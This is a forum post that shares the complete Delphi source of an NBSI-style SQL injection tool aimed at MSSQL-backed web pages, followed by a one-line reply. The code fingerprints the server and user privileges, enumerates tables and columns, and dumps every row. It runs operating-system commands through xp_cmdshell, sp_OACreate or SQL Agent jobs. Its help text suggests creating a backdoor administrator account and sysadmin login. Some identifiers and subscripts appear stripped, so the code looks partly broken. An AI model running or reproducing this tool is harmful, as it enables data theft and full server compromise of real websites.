发出来NBSI delphi版的代码
<SPAN class=tpc_content><FONT size=2><BR>D7原代码:<BR><BR>unit untmain;<BR><BR>interface<BR><BR>uses<BR>Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,<BR>Dialogs, StdCtrls, idHttp, IdBaseComponent, IdComponent, IdTCPConnection,<BR>IdTCPClient, OleCtrls, SHDocVw,mshtml;<BR><BR>type<BR>TForm1 = class(TForm)<BR> Label1: TLabel;<BR> EdtUrl: TEdit;<BR> BtnCheck: TButton;<BR> Label2: TLabel;<BR> GroupBox1: TGroupBox;<BR> Label7: TLabel;<BR> Label3: TLabel;<BR> Label4: TLabel;<BR> Label5: TLabel;<BR> Label6: TLabel;<BR> EdtMuliCase: TEdit;<BR> EdtQuery: TEdit;<BR> EdtUser: TEdit;<BR> EdtPower: TEdit;<BR> EdtDbName: TEdit;<BR> Memo1: TMemo;<BR> GroupBox2: TGroupBox;<BR> cbDisp: TCheckBox;<BR> EdtCommand: TEdit;<BR> rbCmd: TRadioButton;<BR> rbOA: TRadioButton;<BR> BtnExecute: TButton;<BR> GroupBox3: TGroupBox;<BR> Memo2: TMemo;<BR> wb: TWebBrowser;<BR> BtnStop: TButton;<BR> rbJob: TRadioButton;<BR> BtnCancel: TButton;<BR> procedure BtnCheckClick(Sender: TObject);<BR> procedure BtnExecuteClick(Sender: TObject);<BR> procedure wbDocumentComplete(Sender: TObject; const pDisp: IDispatch;<BR> var URL: OleVariant);<BR> procedure BtnStopClick(Sender: TObject);<BR> procedure rbCmdClick(Sender: TObject);<BR> procedure rbOAClick(Sender: TObject);<BR> procedure rbJobClick(Sender: TObject);<BR> procedure FormShow(Sender: TObject);<BR> procedure BtnCancelClick(Sender: TObject);<BR>private<BR> { Private declarations }<BR> tag:integer;<BR> isFinish,isCancel:boolean;<BR> function Get(URL: string): boolean;<BR> function GetWBMsg(URL: string): string;<BR> Function StrToNChar(DbName,TName:string): string;<BR> procedure SetRdbCheck(rd:TRadioButton);<BR>public<BR> { Public declarations }<BR>end;<BR><BR>var<BR>Form1: TForm1;<BR><BR>implementation<BR><BR>{$R *.dfm}<BR><BR>procedure TForm1.BtnCheckClick(Sender: TObject);<BR>const<BR>vFieldCount=5;<BR>PowerStr :array of string=(<BR> 'sysadmin','dbcreator','diskadmin',<BR> 'processadmin','serveradmin',<BR> 'setupadmin','securityadmin');<BR>var<BR>Url,DbName,TName,TName0,ColName,ColName0,NCharStr:string;<BR>i,j,k,iCount:integer;<BR>VerStr,ValueStr,CountStr,Powers:string;<BR>FieldStr,FieldOrdStr,CFieldStr:string;<BR>vfield:OleVariant;<BR>begin<BR>try<BR> EdtMuliCase.Text :='';<BR> EdtQuery.Text :='';<BR> EdtUser.Text :='';<BR> EdtPower.Text :='';<BR> EdtDbName.Text :='';<BR> Url:=trim(EdtUrl.Text);<BR> isFinish :=False;<BR> vfield :=VarArrayCreate(,varVariant);<BR> Memo1.Clear;<BR> Screen.Cursor :=crHourGlass;<BR> //判断是否支持多句查询<BR> if Get(Url+';declare%20@a%20int--') then<BR> begin<BR> EdtMuliCase.Text :='支持';<BR> end else<BR> begin<BR> EdtMuliCase.Text :='不支持';<BR> end;<BR> //判断是否支持子查询<BR> if get(Url+'%20and%20(Select%20count(1)%20from%20)>=0') then<BR> begin<BR> EdtQuery.Text :='支持';<BR> end else<BR> begin<BR> EdtQuery.Text :='不支持';<BR> end;<BR> //取得当前用户<BR> EdtUser.Text :=GetWBMsg(Url+'%20and%20char(124)%2Buser%2Bchar(124)=0');<BR> //取得当前用户登录的服务器角色成员<BR> for i:=0 to High(PowerStr) do<BR> begin<BR> if get(Url+'%20And%20Cast(IS_SRVROLEMEMBER('''+PowerStr+''')%20as%20varchar(1))=1') then<BR> begin<BR> Powers :=Powers+PowerStr+'|';<BR> end;<BR> end;<BR> if Powers='' then<BR> EdtPower.Text :='未知'<BR> else EdtPower.Text :=Powers;<BR> //指明当前用户是否为 db_owner 固定数据库角色的成员<BR>{ if get(Url+'%20And%20Cast(IS_MEMBER(''db_owner'')%20as%20varchar(1))=1') then<BR> begin<BR> EdtPower.Text :='db_owner';<BR> end else<BR> begin<BR> EdtPower.Text :='未知';<BR> end; }<BR> //得到当前SQL Server的版本号<BR> VerStr :=GetWBMsg(Url+'%20and%20char(124)%2B@@version%2Bchar(124)>0');<BR> Memo1.Lines.Add('当前版本号:'+VerStr);<BR> Memo1.Lines.Add('');<BR> //取得数据库名<BR> DbName :=GetWBMsg(Url+'%20And%20char(124)%2Bdb_name()%2Bchar(124)=0');<BR> EdtDbName.Text :=DbName;<BR> if (DbName='') or (DbName='未知') then<BR> begin<BR> Memo1.Lines.Add('未知的数据库,操作终止!');<BR> exit;<BR> end;<BR> Memo1.Lines.Add('当前数据库:'+DbName);<BR> BtnStop.Visible :=true;<BR> BtnCheck.Visible :=False;<BR> //猜解表名<BR> Memo1.Lines.Add('');<BR> Memo1.Lines.Add('开始猜解表名.....');<BR> Memo1.Lines.Add('#######################');<BR> for i:=1 to 1000 do<BR> begin<BR> TName :='';<BR> TName :=GetWBMsg(Url+'%20And%20(Select%20Top%201%20cast(char(124)%2Bname%2Bchar(124)%20as%20varchar(8000))'+<BR> '%20from(Select%20Top%20'+inttostr(i)+'%20id,name%20from%20['+DbName+']..'+<BR> '%20Where%20xtype=char(85)%20order%20by%20id)%20T%20order%20by%20id%20desc)>0;--');<BR> if (TName0=TName) or (isFinish) then<BR> Break;<BR> Memo1.Lines.Add('表名 :'+TName);<BR> //猜解列名<BR> Memo1.Lines.Add('');<BR> Memo1.Lines.Add('开始猜解列名.....');<BR> Memo1.Lines.Add('#######################');<BR> NCharStr :='';<BR> NCharStr :=StrToNChar(DbName,TName);<BR> j:=1;<BR> while j<1000 do<BR> begin<BR> ColName :='';<BR> ColName :=GetWBMsg(Url+'%20And%20(Select%20Top%201%20cast(char(124)%2Bname%2Bchar(124)'+<BR> '%20as%20varchar(8000))%20from%20(Select%20Top%20'+inttostr(j)+'%20colid,name'+<BR> '%20From%20['+DbName+']..%20Where%20id%20=%20'+NCharStr+<BR> '%20Order%20by%20colid)%20T%20Order%20by%20colid%20desc)>0;--');<BR> if (ColName0=ColName) or (isFinish) then<BR> j:=1000<BR> else begin<BR> Memo1.Lines.Add('列名 '+inttostr(j)+' :'+ColName);<BR> if j<vFieldCount+1 then<BR> begin<BR> vfield :=ColName;<BR> end;<BR> ColName0 :=ColName;<BR> inc(j);<BR> end;<BR> end;<BR> Memo1.Lines.Add('#######################');<BR> Memo1.Lines.Add('列名猜解结束.....');<BR> Memo1.Lines.Add('');<BR> //猜解数据<BR> Memo1.Lines.Add('开始猜解数据.....');<BR> Memo1.Lines.Add('#######################');<BR> CountStr :=GetWBMsg(Url+'%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))'+<BR> '%2Bchar(124)%20From%20['+TName+']%20Where%201=1)>0;--');<BR> try<BR> iCount :=strtoint(CountStr);<BR> except<BR> Memo1.Lines.add('出现意外数据,操作终止!');<BR> exit;<BR> end;<BR> Memo1.Lines.Add('表 '+TName+' :共有 '+CountStr+' 条数据。');<BR> CFieldStr :='';<BR> FieldStr :='';<BR> FieldOrdStr :=''; <BR> for k:=0 to vFieldCount-1 do<BR> begin<BR> if k=0 then<BR> begin<BR> CFieldStr :='isNull(cast(['+vfield+']%20as%20varchar(8000)),char(32))';<BR> FieldStr :='['+vfield+']';<BR> FieldOrdStr :='['+vfield+']%20desc';<BR> end else<BR> begin<BR> CFieldStr :=CFieldStr+'%2B%20%2BisNull(cast(['+vfield+']%20as%20varchar(8000)),char(32))';<BR> FieldStr :=FieldStr+',['+vfield+']';<BR> FieldOrdStr :=FieldOrdStr+',['+vfield+']%20desc';<BR> end;<BR> end;<BR> k:=1;<BR> while k<iCount+1 do<BR> begin<BR> ValueStr :='';<BR> ValueStr :=GetWBMsg(Url+'%20And%20(Select%20Top%201%20char(124)%2B'+CFieldStr+'%2Bchar(124)%20From%20(Select'+<BR> '%20Top%20'+inttostr(k)+'%20'+FieldStr+'%20From%20['+DbName+']..['+TName+']%20Where%201=1'+<BR> '%20Order%20by%20'+FieldStr+')%20T%20Order%20by%20'+FieldOrdStr+')>0;--');<BR><BR> if isFinish then<BR> k:=iCount+1;<BR> Memo1.Lines.Add('数据 '+inttostr(k)+' :'+ValueStr);<BR> inc(k);<BR> end;<BR> Memo1.Lines.Add('#######################');<BR> Memo1.Lines.Add('数据猜解结束.....'); <BR> Memo1.Lines.Add('');<BR> TName0 :=TName;<BR> end;<BR> Memo1.Lines.Add('#######################');<BR> Memo1.Lines.Add('表名猜解结束.....');<BR>finally<BR> Screen.Cursor :=crDefault;<BR> BtnStop.Visible :=False;<BR> BtnCheck.Visible :=True;<BR>end;<BR>end;<BR><BR>procedure TForm1.BtnExecuteClick(Sender: TObject);<BR>var<BR>Url,DbName,CommandStr:string;<BR>ResultStr,CountStr:string;<BR>iCount,i:integer;<BR>begin<BR>try<BR> Url:=trim(EdtUrl.Text);<BR> ResultStr :='';<BR> CommandStr :='';<BR> isCancel :=False;<BR> CommandStr:=trim(EdtCommand.Text);<BR> CommandStr:=StringReplace(CommandStr,'%','%25',);<BR> CommandStr:=StringReplace(CommandStr,' ','%20',);<BR> Memo2.Clear;<BR> Screen.Cursor :=crHourGlass;<BR> //取得数据库名<BR> DbName :=GetWBMsg(Url+'%20And%20char(124)%2Bdb_name()%2Bchar(124)=0');<BR> if (DbName='') or (DbName='未知') then<BR> begin<BR> Memo2.Lines.Add('未知的数据库,操作终止!');<BR> exit;<BR> end;<BR> //Cmd_shell<BR> //使用xp_cmdshell来运行系统命令<BR> if rbCmd.Checked then<BR> begin<BR> //回显<BR> if cbDisp.Checked then<BR> begin<BR> BtnCancel.Visible :=true;<BR> BtnExecute.Visible :=False;<BR> //第一种办法<BR> //把命令执行的结果保存到一个本地文件中,然后将此文件的内容写入到新建的临时表进行输出<BR> {CommandStr:=Url+';EXEC%20MASTER..XP_CMDSHELL%20'''+CommandStr+'>C:\Command_Tmp.log'''+<BR> ';DROP%20TABLE%20'+<BR> ';CREATE%20TABLE%20(%20varchar(7996)%20NULL)'+<BR> ';BULK%20INSERT%20['+DbName+']..%20FROM%20''C:\Command_Tmp.log''%20WITH%20(KEEPNULLS)'+<BR> ';Alter%20Table%20%20add%20%20int%20NOT%20NULL%20IDENTITY%20(1,1)--'; }<BR><BR> //第二种办法,直接把命令执行的结果写入数据库中输出,效率较高<BR> CommandStr :=Url+';DROP%20TABLE%20;'+<BR> 'CREATE%20TABLE%20(%20int%20NOT%20NULL%20IDENTITY%20(1,1),'+<BR> '%20%20varchar(1024)%20NULL);'+<BR> 'insert%20into%20(ResultTxt)%20EXEC%20MASTER..XP_CMDSHELL%20'''+<BR> CommandStr+''';insert%20into%20%20values%20(''g_over'')--';<BR><BR> if Get(CommandStr) then<BR> begin<BR> CountStr :=GetWBMsg(Url+'%20And%20(Select%20char(124)%2BCast(Count(1)%20as%20varchar(8000))'+<BR> '%2Bchar(124)%20From%20%20Where%201=1)>0;--');<BR> try<BR> iCount :=strtoint(CountStr);<BR> except<BR> Memo2.Lines.add('出现意外数据,操作终止!');<BR> exit;<BR> end;<BR> for i:=1 to iCount do<BR> begin<BR> ResultStr :='';<BR> ResultStr :=GetWBMsg(Url+'%20And%20(Select%20Top%201%20CASE%20WHEN%20ResultTxt%20is%20Null'+<BR> '%20then%20char(32)%20else%20char(124)%2BResultTxt%2Bchar(124)'+<BR> '%20End%20From%20%20Where%20ID='+IntToStr(i)+')=0;--');<BR> if isCancel then<BR> Break;<BR> if (ResultStr<>'') and (ResultStr<>'未知') then<BR> Memo2.Lines.Add(ResultStr);<BR> end;<BR> end;<BR> if Get(Url+';DROP%20TABLE%20--') then<BR> begin<BR> Memo2.Lines.Add('命令执行完成');<BR> end;<BR> end else<BR> begin<BR> CommandStr:=Url+';EXEC%20MASTER..XP_CMDSHELL%20'''+CommandStr+'''--';<BR> if get(CommandStr) then<BR> Memo2.Lines.Add('命令执行完成。');<BR> end;<BR> end;<BR> //OAcreate<BR> //使用sp_OACreate来运行系统命令<BR> if rbOA.Checked then<BR> begin<BR> //指明当前用户是否为 sysadmin 固定服务器角色的成员<BR> if get(Url+'%20And%20Cast(IS_SRVROLEMEMBER(''sysadmin'')%20as%20varchar(1))=1') then<BR> begin<BR> CommandStr :=Url+';use%20'+DbName+';declare%20@o%20int;exec%20'+<BR> 'sp_oacreate%20''wscript.shell'',@o%20out;exec%20'+<BR> 'sp_oamethod%20@o,''run'',NULL,''cmd%20/c%20'+<BR> CommandStr+'''--';<BR> if Get(CommandStr) then<BR> Memo2.Lines.Add('命令执行完成。');<BR> end else<BR> begin<BR> Memo2.Lines.Add('只有 sysadmin 固定服务器角色的成员才能执行 sp_OACreate。');<BR> exit;<BR> end;<BR> end;<BR> //Job<BR> //使用SQLSERVERAGENT的JOB来运行系统命令<BR> if rbJob.Checked then<BR> begin<BR> //启动SQLSERVERAGENT<BR> if Get(Url+';exec%20master..xp_servicecontrol%20''start'',''SQLSERVERAGENT'';--') then<BR> begin<BR> Memo2.Lines.Add('SQLSERVERAGENT 启动成功!');<BR> CommandStr :=Url+';use%20'+DbName+';exec%20sp_delete_job%20null,''x'''+<BR> ';exec%20sp_add_job%20''x'''+<BR> ';exec%20sp_add_jobstep%20Null,''x'',Null,''1'',''CMDEXEC'',''cmd%20/c%20'+<BR> CommandStr+''';exec%20sp_add_jobserver%20Null,''x'',@@servername'+<BR> ';exec%20sp_start_job%20''x''--';<BR> if get(CommandStr) then<BR> Memo2.Lines.Add('命令执行完成。');<BR> end else<BR> begin<BR> Memo2.Lines.Add('SQLSERVERAGENT 启动失败,操作终止!');<BR> exit;<BR> end;<BR> end;<BR>finally<BR> Screen.Cursor :=crDefault;<BR> BtnExecute.Visible :=true;<BR> BtnCancel.Visible :=false;<BR>end;<BR>end;<BR><BR>function TForm1.Get(URL: string): boolean;<BR>var<BR>IDHTTP: TIDHttp;<BR>ss: String;<BR>begin<BR>Result:= False;<BR>IDHTTP:= TIDHTTP.Create(nil);<BR>try<BR> try<BR> idhttp.HandleRedirects:= true; //必须支持重定向否则可能出错<BR> idhttp.ReadTimeout:= 30000; //超过这个时间则不再访问<BR> ss:= IDHTTP.Get(URL);<BR> if IDHTTP.ResponseCode=200 then<BR> Result :=true;<BR> except<BR> //on E: Exception do<BR> // Application.MessageBox(pchar('出现异常,操作终止!'+#10#13+E.Message),'提示',mb_ok+mb_iconinformation);<BR> end;<BR>finally<BR> IDHTTP.Free;<BR>end;<BR>end;<BR><BR>function TForm1.GetWBMsg(URL: string): string;<BR>function GetResultStr(str:string):string;<BR>var<BR> istart,iend:integer;<BR> ss:string;<BR>begin<BR> istart:=pos('|',str);<BR> if istart>0 then<BR> begin<BR> ss:=copy(str,istart+1,length(str)-istart);<BR> iend :=pos('|',ss);<BR> if iend>0 then<BR> begin<BR> ss:=copy(ss,1,iend-1);<BR> end;<BR> end;<BR> if ss='' then<BR> Result :='未知'<BR> else Result :=ss;<BR>end;<BR>var<BR>ss:string;<BR>begin<BR>tag:=0;<BR>wb.Navigate(URL);<BR>while (tag=0) do<BR> Application.ProcessMessages;<BR>ss :=(wb.Document as IHTMLDocument2).Body.innerText;<BR>Result :=GetResultStr(ss);<BR>end;<BR><BR>function TForm1.StrToNChar(DbName, TName: string): string;<BR>var<BR>i:integer;<BR>ss,str:string;<BR>begin<BR>ss:=DbName+'..'+TName;<BR>for i:=1 to length(ss) do<BR>begin<BR> if i=1 then<BR> str :='NCHAR('+inttostr(ord(ss))+')'<BR> else<BR> str :=str+'%2BNCHAR('+inttostr(ord(ss))+')';<BR>end;<BR>Result :='OBJECT_ID('+str+')';<BR>end;<BR><BR>procedure TForm1.wbDocumentComplete(Sender: TObject;<BR>const pDisp: IDispatch; var URL: OleVariant);<BR>begin<BR>//Memo2.Text :=(wb.Document as IHTMLDocument2).Body.innerText;<BR>tag:=1;<BR>end;<BR><BR>procedure TForm1.BtnStopClick(Sender: TObject);<BR>begin<BR>isFinish :=True;<BR>BtnCheck.Visible :=true;<BR>BtnStop.Visible :=False;<BR>end;<BR><BR>procedure TForm1.SetRdbCheck(rd: TRadioButton);<BR>begin<BR>Memo2.Clear; <BR>if rd=rbCmd then<BR>begin<BR> cbDisp.Enabled :=True;<BR> Memo2.Lines.Add('使用xp_cmdshell来运行系统命令');<BR> Memo2.Lines.Add('');<BR> Memo2.Lines.Add('net user test test /add');<BR> Memo2.Lines.Add('net localgroup administrators test /add');<BR> Memo2.Lines.Add('exec master..sp_addlogin test,test');<BR> Memo2.Lines.Add('exec master..sp_addsrvrolemember test,sysadmin');<BR>end;<BR>if rd=rbOA then<BR>begin<BR> cbDisp.Enabled :=False;<BR> Memo2.Lines.Add('使用sp_OACreate来运行系统命令');<BR>end;<BR>if rd=rbJob then<BR>begin<BR> cbDisp.Enabled :=False;<BR> Memo2.Lines.Add('使用SQLSERVERAGENT的JOB来运行系统命令');<BR> Memo2.Lines.Add('请先使用下列语句启动SQLSERVERAGENT:');<BR> Memo2.Lines.Add('');<BR> Memo2.Lines.Add('</FONT><A href="http://x.com/x.asp?a=1;exec" target=_blank><FONT size=2>http://x.com/x.asp?a=1;exec</FONT></A><FONT size=2> master..xp_servicecontrol ''start'',''SQLSERVERAGENT'';--');<BR>end;<BR>end;<BR><BR>procedure TForm1.rbCmdClick(Sender: TObject);<BR>begin<BR>SetRdbCheck(rbcmd);<BR>end;<BR><BR>procedure TForm1.rbOAClick(Sender: TObject);<BR>begin<BR>SetRdbCheck(rbOA);<BR>end;<BR><BR>procedure TForm1.rbJobClick(Sender: TObject);<BR>begin<BR>SetRdbCheck(rbJob);<BR>end;<BR><BR>procedure TForm1.FormShow(Sender: TObject);<BR>begin<BR>SetRdbCheck(rbcmd);<BR>end;<BR><BR>procedure TForm1.BtnCancelClick(Sender: TObject);<BR>begin<BR>isCancel :=True;<BR>BtnExecute.Visible :=true;<BR>BtnCancel.Visible :=false;<BR>end;<BR><BR>end.</FONT></SPAN><BR>re:发出来NBSI delphi版的代码
嘿嘿 !
页:
[1]